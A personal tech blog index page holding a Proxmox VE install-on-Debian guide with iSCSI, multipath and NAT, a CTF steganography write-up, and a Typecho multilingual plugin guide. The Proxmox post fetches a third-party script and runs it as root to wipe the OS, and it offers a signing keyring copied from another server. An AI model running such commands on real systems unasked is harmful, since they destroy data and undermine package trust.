Homepage
Privacy Policy
iYoRoy DN42 Network
About
More
Friends
Language
简体中文
English
Search
1
Centralized Deployment of EasyTier using Docker
1,705 Views
2
Adding KernelSU Support to Android 4.9 Kernel
1,091 Views
3
Enabling EROFS Support for an Android ROM with Kernel 4.9
309 Views
4
Installing 1Panel Using Docker on TrueNAS
300 Views
5
2025 Yangcheng Cup CTF Preliminary WriteUp
296 Views
Android
Ops
NAS
Develop
Network
Projects
DN42
One Man ISP
CTF
Cybersecurity
Brain Dumps
Login
Search
Search Tags
Network Technology
BGP
BIRD
Linux
DN42
Android
OSPF
C&C++
Web
AOSP
Cybersecurity
Docker
CTF
Windows
MSVC
Services
Model Construction
Kernel
caf/clo
IGP
Kagura iYoRoy
A total of
31
articles have been written.
A total of
23
comments have been received.
Index
Column
Android
Ops
NAS
Develop
Network
Projects
DN42
One Man ISP
CTF
Cybersecurity
Brain Dumps
Pages
Privacy Policy
iYoRoy DN42 Network
About
Friends
Language
简体中文
English
31
articles related to
were found.
An Experience of Manually Installing Proxmox VE, Configuring Multipath iSCSI, and NAT Forwarding
The reason was that I rented a physical server, but the IDC did not provide Proxmox VE or Debian system images, only Ubuntu, CentOS, and Windows series. Additionally, the data disk was provided via multipath iSCSI. I wanted to use PVE for isolating different usage scenarios, so I attempted to reinstall the system and migrate the aforementioned configurations. Backup Configuration First, perform a general check of the system, which reveals: The system has two Network Interfaces: enp24s0f0 is connected to a public IP address for external access; enp24s0f1 is connected to the private network address 192.168.128.153. The data disk is mapped to /dev/mapper/mpatha. Under /etc/iscsi, there are configurations for two iSCSI Nodes: 192.168.128.250:3260 and 192.168.128.252:3260, both corresponding to the same target iqn.2024-12.com.ceph:iscsi. It can be inferred that the data disk is mounted by configuring two iSCSI Nodes and then merging them into a single device using multipath. Check the system's network configuration: network: version: 2 renderer: networkd ethernets: enp24s0f0: addresses: [211.154.[REDACTED]/24] routes: - to: default via: [REDACTED] match: macaddress: ac:1f:6b:0b:e2:d4 set-name: enp24s0f0 nameservers: addresses: - 114.114.114.114 - 8.8.8.8 enp24s0f1: addresses: - 192.168.128.153/17 match: macaddress: ac:1f:6b:0b:e2:d5 set-name: enp24s0f1 It's found to be very simple static routing. The internal network interface doesn't even have a default route; just binding the IP is sufficient. Then, save the iSCSI configuration files from /etc/iscsi, which include account and password information. Reinstall Debian Used the bin456789/reinstall script for this reinstallation. Download the script: curl -O https://cnb.cool/bin456789/reinstall/-/git/raw/main/reinstall.sh || wget -O ${_##*/} $_ Reinstall as Debian 13 (Trixie): bash reinstall.sh debian 13 Then, enter the password you want to set as prompted. If all goes well, wait about 10 minutes, and it will automatically complete and reinstall into a clean Debian 13. You can connect via SSH during the process using the set password to check the installation progress. After reinstalling, perform a source change and apt upgrade as usual to get a clean Debian 13. For changing sources, directly refer to the USTC Mirror Site tutorial. Install Proxmox VE This step mainly refers to the Proxmox official tutorial. Note: The Debian installed by the above script sets the hostname to localhost. If you want to change it, please modify it before configuring the Hostname and change the hostname in hosts to your modified hostname, not localhost. Configure Hostname Proxmox VE requires the current hostname to be resolvable to a non-loopback IP address: The hostname of your machine must be resolvable to an IP address. This IP address must not be a loopback one like 127.0.0.1 but one that you and other hosts can connect to. For example, my server IP is 211.154.[CENSORED], I need to add the following record in /etc/hosts: 127.0.0.1 localhost +211.154.[CENSORED] localhost ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters After saving, use hostname --ip-address to check if it outputs the set non-loopback address: ::1 127.0.0.1 211.154.[CENSORED]. Add Proxmox VE Software Repository Debian 13 uses the Deb822 format (though you can use sources.list if you want), so just refer to the USTC Proxmox Mirror Site: cat > /etc/apt/sources.list.d/pve-no-subscription.sources <<EOF Types: deb URIs: https://mirrors.ustc.edu.cn/proxmox/debian/pve Suites: trixie Components: pve-no-subscription Signed-By: /usr/share/keyrings/proxmox-archive-keyring.gpg EOF Here, a keyring needs to be migrated but I couldn't find one after searching online, so I chose to pull a copy from an existing Proxmox VE server. It's available here: proxmox-keyrings.zip Extract the public key file and place it in /usr/share/keyrings/, then run: apt update apt upgrade -y This will sync the Proxmox VE software repository. Install Proxmox VE Kernel Use the following command to install the PVE kernel and reboot to apply the new kernel: apt install proxmox-default-kernel reboot Afterwards, uname -r should show a kernel version ending with pve, like 6.17.2-2-pve, indicating the new kernel is successfully applied. Install Proxmox VE Related Packages Use apt to install the corresponding packages: apt install proxmox-ve postfix open-iscsi chrony During configuration, you will need to set up the postfix mail server. Official explanation: If you have a mail server in your network, you should configure postfix as a satellite system. Your existing mail server will then be the relay host which will route the emails sent by Proxmox VE to their final recipient. If you don't know what to enter here, choose local only and leave the system name as is. After this, you should be able to access the Web console at https://<your server address>:8006. The account is root, and the password is your root password, i.e., the password configured during the Debian reinstallation. Remove Old Debian Kernel and os-prober Use the following commands: apt remove linux-image-amd64 'linux-image-6.1*' update-grub apt remove os-prober to remove the old Debian kernel, update grub, and remove os-prober. Removing os-prober is not mandatory, but it is recommended by the official guide because it might mistakenly identify VM boot files as multi-boot files, adding incorrect entries to the boot list. At this point, the installation of Proxmox VE is complete and ready for normal use! Configuring Internal Network Interface Because the iSCSI network interface and the public network interface are different, and the reinstallation lost this configuration, the internal network interface needs to be manually configured. Open the Proxmox VE Web interface, go to Datacenter - localhost (hostname) - Network, edit the internal network interface (e.g., ens6f1 here), enter the backed-up IPv4 in CIDR format: 192.168.128.153/17, and check Autostart, then save. Then use the command to set the interface state to UP: ip link set ens6f1 up Now you should be able to ping the internal iSCSI server's IP. Configure Data Disk iSCSI In the previous step, we should have installed the open-iscsi package required for iscsiadm. We just need to reset the nodes according to the backed-up configuration. First, discover the iSCSI storage: iscsiadm -m discovery -t st -p 192.168.128.250:3260 This should yield the two original LUN Targets: 192.168.128.250:3260,1 iqn.2024-12.com.ceph:iscsi 192.168.128.252:3260,2 iqn.2024-12.com.ceph:iscsi Transfer the backed-up configuration files to the server, overwriting the existing configuration in /etc/iscsi. Also, in my backed-up config, I found the authentication configuration: # /etc/iscsi/nodes/iqn.2024-12.com.ceph:iscsi/192.168.128.250,3260,1/default # BEGIN RECORD 2.1.5 node.name = iqn.2024-12.com.ceph:iscsi ... # Some unimportant configurations omitted node.session.auth.authmethod = CHAP node.session.auth.username = [CENSORED] node.session.auth.password = [CENSORED] node.session.auth.chap_algs = MD5 ... # Some unimportant configurations omitted # /etc/iscsi/nodes/iqn.2024-12.com.ceph:iscsi/192.168.128.252,3260,2/default # BEGIN RECORD 2.1.5 node.name = iqn.2024-12.com.ceph:iscsi ... # Some unimportant configurations omitted node.session.auth.authmethod = CHAP node.session.auth.username = [CENSORED] node.session.auth.password = [CENSORED] node.session.auth.chap_algs = MD5 ... # Some unimportant configurations omitted Write these configurations to the new system using: iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.authmethod -v CHAP iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.username -v [CENSORED] iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.password -v [CENSORED] iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.chap_algs -v MD5 iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.session.auth.authmethod -v CHAP iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.session.auth.username -v [CENSORED] iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.session.auth.password -v [CENSORED] iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.chap_algs -v MD5 (I don't know why the auth info needs to be written separately, but testing shows it won't log in without rewriting it.) Then, use: iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 --login iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 --login to log into the Targets. Then use: iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.startup -v automatic iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.startup -v automatic to enable automatic mounting on boot. At this point, checking disks with tools like lsblk should reveal two additional hard drives; in my case, sdb and sdc appeared. Configure Multipath To identify if it's a multipath device, I tried: /usr/lib/udev/scsi_id --whitelisted --device=/dev/sdb /usr/lib/udev/scsi_id --whitelisted --device=/dev/sdc Checking the scsi_id of the two disk devices revealed they were identical, confirming they are the same disk using multi-path for load balancing and failover. Install multipath-tools using apt: apt install multipath-tools Then, create /etc/multipath.conf and add: defaults { user_friendly_names yes find_multipaths yes } Configure multipathd to start on boot: systemctl start multipathd systemctl enable multipathd Then, use the following command to scan and automatically configure the multipath device: multipath -ll It should output: mpatha(360014056229953ef442476e85501bfd7)dm-0LIO-ORG,TCMU device size=500G features='1 queue_if_no_path' hwhandler='1 alua'wp=rw |-+- policy='service-time 0' prio=50 status=active | `- 14:0:0:152 sdb 8:16 active ready running `-+- policy='service-time 0' prio=50 status=active `- 14:0:0:152 sdc 8:16 active ready running This shows the two disks have been recognized as a single multipath device. Now, you can find the multipath disk under /dev/mapper/: root@localhost:/dev/mapper# ls control mpatha mpatha is the multipath aggregated disk. If it's not scanned, try using: rescan-scsi-bus.sh to rescan the SCSI bus and try again. If the command is not found, install it via apt install sg3-utils. If all else fails, just reboot. Configure Proxmox VE to Use the Data Disk Because we used multipath, we cannot directly add an iSCSI type storage. Use the following commands to create the PV and VG: pvcreate /dev/mapper/mpatha vgcreate <vg name> /dev/mapper/mpatha Here, I configured the entire disk as a PV. You could also create a separate partition for this. After completion, open the Proxmox VE management interface, go to Datacenter - Storage, click Add - LVM, select the name of the VG you just created for Volume group, give it an ID (name), and click Add. At this point, all configurations from the original system should have been migrated. Configure NAT and Port Forwarding NAT Because only one IPv4 address was purchased, NAT needs to be configured to allow all VMs to access the internet normally. Open /etc/network/interfaces and add the following content: auto vmbr0 iface vmbr0 inet static address 192.168.100.1 netmask 255.255.255.0 bridge_ports none bridge_stp off bridge_fd 0 post-up echo 1 > /proc/sys/net/ipv4/ip_forward post-up iptables -t nat -A POSTROUTING -s 192.168.100.0/24 -o ens6f0 -j MASQUERADE post-up iptables -t raw -I PREROUTING -i fwbr+ -j CT --zone 1 post-up iptables -A FORWARD -i vmbr0 -j ACCEPT post-down iptables -t nat -D POSTROUTING -s 192.168.100.0/24 -o ens6f0 -j MASQUERADE post-down iptables -t raw -D PREROUTING -i fwbr+ -j CT --zone 1 post-down iptables -D FORWARD -i vmbr0 -j ACCEPT Here, vmbr0 is the NAT bridge, with the IP segment 192.168.100.0/24. Traffic from this segment will be translated to the IP of the external network interface ens6f0 for outgoing traffic, and translated back to the original IP upon receiving replies, enabling IP sharing. Then, use: ifreload -a to reload the configuration. Now, the VMs should be able to access the internet. Just configure a static IP within the 192.168.100.0/24 range during installation, set the default gateway to 192.168.100.1, and configure the DNS address. Port Forwarding Got lazy, directly prompted an AI. Had an AI write a configuration script /usr/local/bin/natmgr: #!/bin/bash # =================Configuration Area================= # Public network interface name (Please modify according to your actual situation) PUB_IF="ens6f0" # ==================================================== ACTION=$1 ARG1=$2 ARG2=$3 ARG3=$4 ARG4=$5 # Check if running as root if [ "$EUID" -ne 0 ]; then echo "Please run this script with root privileges" exit 1 fi # Generate random ID (6 characters) generate_id() { # Introduce nanoseconds and random salt to ensure ID uniqueness even if the script runs quickly echo "$RANDOM $(date +%s%N)" | md5sum | head -c 6 } # Show help information usage() { echo "Usage: $0 {add|del|list|save} [parameters]" echo "" echo "Commands:" echo " add <Public Port> <Internal IP> <Internal Port> [Protocol] Add forwarding rule" echo " [Protocol] optional: tcp, udp, both (default: both)" echo " del <ID> Delete forwarding rule by ID" echo " list View all current forwarding rules" echo " save Save current rules to persist after reboot (Must run!)" echo "" echo "Examples:" echo " $0 add 8080 192.168.100.101 80 both" echo " $0 save" echo "" } # Internal function: add single protocol rule _add_single_rule() { local PROTO=$1 local L_PORT=$2 local T_IP=$3 local T_PORT=$4 local RULE_ID=$(generate_id) local COMMENT="NAT_ID:${RULE_ID}" # 1. Add DNAT rule (PREROUTING chain) iptables -t nat -A PREROUTING -i $PUB_IF -p $PROTO --dport $L_PORT -j DNAT --to-destination $T_IP:$T_PORT -m comment --comment "$COMMENT" # 2. Add FORWARD rule (Allow packet passage) iptables -A FORWARD -p $PROTO -d $T_IP --dport $T_PORT -m comment --comment "$COMMENT" -j ACCEPT # Output result printf "%-10s %-10s %-10s %-20s %-10s\n" "$RULE_ID" "$PROTO" "$L_PORT" "$T_IP:$T_PORT" "Success" # Remind user to save echo "Please run '$0 save' to ensure rules persist after reboot." } # Main add function add_rule() { local L_PORT=$1 local T_IP=$2 local T_PORT=$3 local PROTO_REQ=${4:-both} # Default to both if [[ -z "$L_PORT" || -z "$T_IP" || -z "$T_PORT" ]]; then echo "Error: Missing parameters" usage exit 1 fi # Convert to lowercase PROTO_REQ=$(echo "$PROTO_REQ" | tr '[:upper:]' '[:lower:]') echo "Adding rule..." printf "%-10s %-10s %-10s %-20s %-10s\n" "ID" "Protocol" "Public Port" "Target Address" "Status" echo "------------------------------------------------------------------" if [[ "$PROTO_REQ" == "tcp" ]]; then _add_single_rule "tcp" "$L_PORT" "$T_IP" "$T_PORT" elif [[ "$PROTO_REQ" == "udp" ]]; then _add_single_rule "udp" "$L_PORT" "$T_IP" "$T_PORT" elif [[ "$PROTO_REQ" == "both" ]]; then _add_single_rule "tcp" "$L_PORT" "$T_IP" "$T_PORT" _add_single_rule "udp" "$L_PORT" "$T_IP" "$T_PORT" else echo "Error: Unsupported protocol '$PROTO_REQ'. Please use tcp, udp, or both." exit 1 fi echo "------------------------------------------------------------------" } # Delete rule (Delete in reverse line number order) del_rule() { local RULE_ID=$1 if [[ -z "$RULE_ID" ]]; then echo "Error: Please provide rule ID" usage exit 1 fi echo "Searching for rule with ID [${RULE_ID}]..." local FOUND=0 # --- Clean NAT table (PREROUTING) --- LINES=$(iptables -t nat -nL PREROUTING --line-numbers | grep "NAT_ID:${RULE_ID}" | awk '{print $1}' | sort -rn) if [[ ! -z "$LINES" ]]; then for line in $LINES; do iptables -t nat -D PREROUTING $line echo "Deleted NAT table PREROUTING chain line $line" FOUND=1 done fi # --- Clean Filter table (FORWARD) --- LINES=$(iptables -t filter -nL FORWARD --line-numbers | grep "NAT_ID:${RULE_ID}" | awk '{print $1}' | sort -rn) if [[ ! -z "$LINES" ]]; then for line in $LINES; do iptables -t filter -D FORWARD $line echo "Deleted Filter table FORWARD chain line $line" FOUND=1 done fi if [[ $FOUND -eq 0 ]]; then echo "No rule found with ID $RULE_ID." else echo "Delete operation completed." echo "Please run '$0 save' to update the persistent configuration file." fi } # Save rules to disk (New feature) save_rules() { echo "Saving current iptables rules..." # netfilter-persistent is the service managing iptables-persistent in Debian/Proxmox if command -v netfilter-persistent &> /dev/null; then netfilter-persistent save if [ $? -eq 0 ]; then echo "✅ Rules successfully saved to /etc/iptables/rules.v4, will be automatically restored after system reboot." else echo "❌ Failed to save rules. Please check the status of the 'netfilter-persistent' service." fi else echo "Warning: 'netfilter-persistent' command not found." echo "Please ensure the 'iptables-persistent' package is installed." echo "Install command: apt update && apt install iptables-persistent" fi } # List rules list_rules() { echo "Current Port Forwarding Rules List:" printf "%-10s %-10s %-10s %-20s %-10s\n" "ID" "Protocol" "Public Port" "Target Address" "Target Port" echo "------------------------------------------------------------------" # Parse iptables output iptables -t nat -nL PREROUTING -v | grep "NAT_ID:" | while read line; do id=$(echo "$line" | grep -oP '(?<=NAT_ID:)[^ ]*') # Extract protocol if echo "$line" | grep -q "tcp"; then proto="tcp"; else proto="udp"; fi # Extract port after dpt: l_port=$(echo "$line" | grep -oP '(?<=dpt:)[0-9]+') # Extract IP:Port after to: target=$(echo "$line" | grep -oP '(?<=to:).*') t_ip=${target%:*} t_port=${target#*:} printf "%-10s %-10s %-10s %-20s %-10s\n" "$id" "$proto" "$l_port" "$t_ip" "$t_port" done } # Main logic case "$ACTION" in add) add_rule "$ARG1" "$ARG2" "$ARG3" "$ARG4" ;; del) del_rule "$ARG1" ;; list) list_rules exit 0 ;; save) save_rules ;; *) usage exit 1 ;; esac save_rules This script automatically adds/deletes iptables rules for port forwarding. Remember to chmod +x. Use iptables-persistent to save the configuration and load it automatically on boot: apt install iptables-persistent During configuration, you will be asked whether to save the current rules; Yes or No is fine. When adding a forwarding rule, use natmgr add <host listen port> <VM internal IP> <VM port> [tcp/udp/both]. The script will automatically assign a unique ID. Use natmgr del <ID> to delete. Use natmgr list to view the existing forwarding list. Reference Articles: bin456789/reinstall: 一键DD/重装脚本 (One-click reinstall OS on VPS) - GitHub Install Proxmox VE on Debian 12 Bookworm - Proxmox VE PVE连接 TrueNAS iSCSI存储实现本地无盘化_pve iscsi-CSDN博客 ProxmoxVE (PVE) NAT 网络配置方法 - Oskyla 烹茶室
29/11/2025
266 Views
0 Comments
2 Stars
2025 Gujianshan Misc Fruit WriteUp
Open the file using 010 Editor and find a ZIP header at the end: Extract it and open it to find no password, just a string of base64: 5L2g6L+Z6Iu55p6c5oCO5LmI6L+Z5LmI5aSnCuWkp+S4quWEv+aJjeWAvOmSseS9oOimgeS4jeimgQrov5nmoYPlrZDmgI7kuYjov5nkuYjnoawK56Gs5piv5Zug5Li65paw6bKc5L2g6KaB6L2v55qE6L+Y5piv57Ov55qECui/meilv+eTnOiDveWQg+WQl+eci+i1t+adpeacieeCueS4jeeGnwrkuI3nhp/nmoTopb/nk5zmgI7kuYjlj6/og73kvaDov5nlsLHmmK/nrYnnnYDlkIPnlJznmoQK5L2g6L+Z5p+a5a2Q6L+Z5LmI5bCPCuWwj+W3p+eahOaJjeWlveWQg+S9oOimgeWkp+S4queahOi/mOaYr+WlveWQg+eahArov5nmqZnlrZDmgI7kuYjov5nkuYjphbgK6YW45omN5piv5q2j5a6X55qE5qmZ5a2Q5L2g6KaB5piv55Sc55qE5Y675Yir5a6255yLCui/memmmeiVieacieeCueW8rwrlvK/nmoTpppnolYnmm7TnlJzkvaDkuI3mh4IK5L2g6L+Z5qKo5a2Q5piv5LiN5piv5pyJ54K556GsCuehrOaYr+WboOS4uuaWsOmynOWQg+edgOacieWPo+aEnwrov5nokaHokITmgI7kuYjov5nkuYjlsI8K5bCP55qE6JGh6JCE5pu05rWT57yp55Sc5ZGz Decode to get: 你这苹果怎么这么大 大个儿才值钱你要不要 这桃子怎么这么硬 硬是因为新鲜你要软的还是糯的 这西瓜能吃吗看起来有点不熟 不熟的西瓜怎么可能你这就是等着吃甜的 你这柚子这么小 小巧的才好吃你要大个的还是好吃的 这橙子怎么这么酸 酸才是正宗的橙子你要是甜的去别家看 这香蕉有点弯 弯的香蕉更甜你不懂 你这梨子是不是有点硬 硬是因为新鲜吃着有口感 这葡萄怎么这么小 小的葡萄更浓缩甜味 At the same time, it is found that there is still part of unrecognized data at the end of the exported zip: Based on the 1A 9E 97 BA 2A, it can be inferred that this is OurSecret steganography. Open it with the OurSecret tool and find that a password is required. Try the password shuiguo to extract a txt file: 你这柚子这么小 你这柚子这么小 你这柚子这么小 你这梨子是不是有点硬 你这柚子这么小 大个儿才值钱你要不要 你这柚子这么小 小巧的才好吃你要大个的还是好吃的 小巧的才好吃你要大个的还是好吃的 弯的香蕉更甜你不懂 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 不熟的西瓜怎么可能你这就是等着吃甜的 硬是因为新鲜你要软的还是糯的 这桃子怎么这么硬 硬是因为新鲜你要软的还是糯的 不熟的西瓜怎么可能你这就是等着吃甜的 硬是因为新鲜你要软的还是糯的 酸才是正宗的橙子你要是甜的去别家看 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 你这苹果怎么这么大 你这柚子这么小 大个儿才值钱你要不要 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜你要软的还是糯的 酸才是正宗的橙子你要是甜的去别家看 你这柚子这么小 这西瓜能吃吗看起来有点不熟 你这柚子这么小 这桃子怎么这么硬 你这柚子这么小 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 酸才是正宗的橙子你要是甜的去别家看 你这柚子这么小 这桃子怎么这么硬 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜你要软的还是糯的 这西瓜能吃吗看起来有点不熟 你这柚子这么小 硬是因为新鲜你要软的还是糯的 你这柚子这么小 这西瓜能吃吗看起来有点不熟 硬是因为新鲜你要软的还是糯的 这西瓜能吃吗看起来有点不熟 你这柚子这么小 不熟的西瓜怎么可能你这就是等着吃甜的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 你这柚子这么小 大个儿才值钱你要不要 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜你要软的还是糯的 这桃子怎么这么硬 你这柚子这么小 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 这桃子怎么这么硬 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜吃着有口感 It is found that this corresponds one-to-one with the previously extracted statements. Since there are 16 statements extracted earlier, it is speculated that they represent hexadecimal digits, corresponding to 0-f respectively. Then, map the OurSecret decrypted content to hexadecimal numbers to obtain: 666c61677b33653235393630613739646263363962363734636434656336376137326336327d. Write a Python script to convert the hexadecimal string to ASCII characters in groups of two: hex_string = "666c61677b33653235393630613739646263363962363734636434656336376137326336327d" ascii_string = ''.join([chr(int(hex_string[i:i+2], 16)) for i in range(0, len(hex_string), 2)]) print(ascii_string) Get the Flag: flag{3e25960a79dbc69b674cd4ec67a72c62}
29/11/2025
398 Views
0 Comments
5 Stars
Configuring a Simple Multi-language Solution for Typecho
I wanted to add internationalization support to my blog, providing a separate English version for each post and page. However, after searching online, I found that Typecho has poor support for i18n. Eventually, I designed my own solution and am documenting it here. This article assumes you have some basic understanding of PHP, Nginx, and Typecho's core logic. Analysis Requirements Need to provide both Chinese and English versions for each post and page. Need to configure a language switcher so users can easily switch languages on the frontend. Need search engines to correctly identify and index the multi-language versions of the content. Proposed Solution There are roughly two main schemes for distinguishing between Chinese and English content: Use a separate parameter, like accessing posts with /?lang=zh-CN and /?lang=en-US. However, this scheme is relatively difficult to implement and less friendly for search engine indexing. Distinguish via the URL path, e.g., https://<host>/article for the Chinese page and https://<host>/en/article for the English page. This is simpler to configure (essentially setting up two separate Typecho instances) and is more search engine friendly. The challenge is that comments and view counts need to be manually synchronized. After summarizing, I chose the second scheme and planned to implement multi-language support by creating a new Typecho instance directly under the /en/ path. Implementation Plan First, duplicate the blog instance into two copies: one for Chinese and one for English, then translate the English copy. Modify the frontend code to implement the language switcher. To ensure the article URLs between the two sites only differ by the /en prefix, the cid (content ID) for corresponding articles must be the same. Since cid is auto-incremented based on the order of creating posts and attachments, I plan to write a sync plugin. When a post is published on the Chinese site, it automatically inserts a corresponding article with the same cid in the English database. Modify the SiteMap plugin. Because a sitemap cannot both contain page links and references to other sitemaps, the main site needs to create two sitemaps: one main sitemap containing the Chinese site pages, and another index sitemap responsible for indexing both the Chinese and English sitemaps. Add the hreflang attribute within the <head></head> section to inform search engines about the multi-language handling. Link the view counts and like counts from the English site to the Chinese database. Sync the comments between two instances. Let's Do It Create the English Instance Copy the entire website directory and place it in the /en/ folder under the original web root. Also, duplicate the database; I named the new one typecho_en. Next, configure URL rewrite (pseudo-static) rules for both instances: location /en/ { if (!-e $request_filename) { rewrite ^(.*)$ /en/index.php$1 last; } } location / { if (!-e $request_filename) { rewrite ^(.*)$ /index.php$1 last; } } The reason for wrapping the main Chinese instance's rules in a location block is that during testing, I found that without it, the English instance might be parsed as part of the Chinese instance, leading to 404 errors. Also, modify the database configuration in <webroot>/en/config.inc.php to point to the English instance's database. At this point, accessing <host>/en/ should display a site identical to the main Chinese site. Modify Typecho Language This step might be optional since the frontend language is largely determined by the theme. Changing Typecho's backend language isn't strictly necessary but helps for consistency (and makes it easy to tell which admin panel you're in!). Simply refer to the official Typecho multi-language support on GitHub. Download the language pack from the Releases and extract it to <webroot>/en/usr/langs/. Then, navigate to https://<host>/en/admin/options-general.php, where you should see the language setting option. Change it to English. Translate the Theme This is the most tedious step. I use the Joe theme. Go to <webroot>/en/usr/themes/Joe and translate all the Chinese text related to display into English. There's no very convenient method here; machine translation often sounds awkward, so I opted for manual translation. Note that some frontend configurations are within JS files, not just PHP source files. These need translation too. Translate Articles This step is self-explanatory. Translate the articles under /en/ one by one into English and save them. Configure Article Sync Publishing This step ensures the cid remains synchronized between corresponding articles on both sites. Since cid relates to the access URL, keeping them in sync simplifies the language switcher configuration later—just adding or removing /en from the host. cid is an auto-incrementing primary key field in the typecho_contents table. Its assignment is also related to attachments in Typecho. Since I plan to upload all attachments to the Chinese site, without special handling, the cid values can easily become misaligned, increasing subsequent work. Therefore, my chosen solution is to use AI to help write a plugin that triggers when the Chinese site publishes an article. It reads the cid assigned by the Chinese site and writes a corresponding entry into the English site's database. Create the file <webroot>/usr/plugins/SyncToEnglish/Plugin.php and fill it with the following content: <?php if (!defined('__TYPECHO_ROOT_DIR__')) exit; /** * Sync Chinese Articles to English Database * * @package SyncToEnglish * @author ChatGPT, iYoRoy * @version 1.0.0 * @link https://example.com */ class SyncToEnglish_Plugin implements Typecho_Plugin_Interface { public static function activate() { Typecho_Plugin::factory('Widget_Contents_Post_Edit')->finishPublish = [__CLASS__, 'push']; return 'SyncToEnglish plugin activated: Empty corresponding articles will be automatically created in the English database when Chinese articles are published.'; error_log("[SyncToEnglish] Plugin activated successfully"); } public static function deactivate() { return 'SyncToEnglish plugin deactivated'; } public static function config(Typecho_Widget_Helper_Form $form) { $host = new Typecho_Widget_Helper_Form_Element_Text('host', NULL, 'localhost', _t('English DB Host')); $user = new Typecho_Widget_Helper_Form_Element_Text('user', NULL, 'root', _t('English DB Username')); $password = new Typecho_Widget_Helper_Form_Element_Password('password', NULL, NULL, _t('English DB Password')); $database = new Typecho_Widget_Helper_Form_Element_Text('database', NULL, 'typecho_en', _t('English DB Name')); $port = new Typecho_Widget_Helper_Form_Element_Text('port', NULL, '3306', _t('English DB Port')); $charset = new Typecho_Widget_Helper_Form_Element_Text('charset', NULL, 'utf8mb4', _t('Charset')); $prefix = new Typecho_Widget_Helper_Form_Element_Text('prefix', NULL, 'typecho_', _t('Table Prefix')); $form->addInput($host); $form->addInput($user); $form->addInput($password); $form->addInput($database); $form->addInput($port); $form->addInput($charset); $form->addInput($prefix); } public static function personalConfig(Typecho_Widget_Helper_Form $form) {} public static function push($contents, $widget) { $options = Helper::options(); $config = $options->plugin('SyncToEnglish'); // Get article info from Chinese database $cnDb = Typecho_Db::get(); if (is_array($contents) && isset($contents['cid'])) { $cid = $contents['cid']; $title = $contents['title']; } elseif (is_object($contents) && isset($contents->cid)) { $cid = $contents->cid; $title = $contents->title; } else { $db = Typecho_Db::get(); $row = $db->fetchRow($db->select()->from('table.contents')->order('cid', Typecho_Db::SORT_DESC)->limit(1)); $cid = $row['cid']; $title = $row['title']; error_log("[SyncToEnglish DEBUG] CID not found in param, fallback to latest cid={$cid}\n", 3, __DIR__ . '/debug.log'); } $article = $cnDb->fetchRow($cnDb->select()->from('table.contents')->where('cid = ?', $cid)); if (!$article) return; $enDb = new Typecho_Db('Mysql', $config->prefix); $enDb->addServer([ 'host' => $config->host, 'user' => $config->user, 'password' => $config->password, 'charset' => $config->charset, 'port' => (int)$config->port, 'database' => $config->database ], Typecho_Db::READ | Typecho_Db::WRITE); try { $exists = $enDb->fetchRow($enDb->select()->from('table.contents')->where('cid = ?', $article['cid'])); if ($exists) { $enDb->query($enDb->update('table.contents') ->rows([ // 'title' => $article['title'], 'slug' => $article['slug'], 'modified' => $article['modified'] ]) ->where('cid = ?', $article['cid']) ); } else { $enDb->query($enDb->insert('table.contents')->rows([ 'cid' => $article['cid'], 'title' => $article['title'], 'slug' => $article['slug'], 'created' => $article['created'], 'modified' => $article['modified'], 'type' => $article['type'], 'status' => $article['status'], 'authorId' => $article['authorId'], 'views' => 0, 'text' => $article['text'], 'allowComment' => $article['allowComment'], 'allowFeed' => $article['allowFeed'], 'allowPing' => $article['allowPing'] ])); } } catch (Exception $e) { error_log('[SyncToEnglish] Sync failed: ' . $e->getMessage()); } } } Then, go to the admin backend, enable the plugin, and configure the English database information. After completion, publishing an article on the Chinese site should automatically publish an article with the same cid on the English site. Configure the Language Switcher Since we have synchronized the article cid, switching languages now only requires modifying the URL by adding or removing the /en/ prefix. We can create a switcher using PHP and place it in the theme's header: <!-- Language Selector --> <div class="joe_dropdown" trigger="hover" placement="60px"> <div class="joe_dropdown__link"> <a href="#" rel="nofollow">Language</a> <svg class="joe_dropdown__link-icon" viewBox="0 0 1024 1024" xmlns="http://www.w3.org/2000/svg" width="14" height="14"> <path d="M561.873 725.165c-11.262 11.262-26.545 21.72-41.025 18.502-14.479 2.413-28.154-8.849-39.415-18.502L133.129 375.252c-17.697-17.696-17.697-46.655 0-64.352s46.655-17.696 64.351 0l324.173 333.021 324.977-333.02c17.696-17.697 46.655-17.697 64.351 0s17.697 46.655 0 64.351L561.873 725.165z" fill="var(--main)" /> </svg> </div> <nav 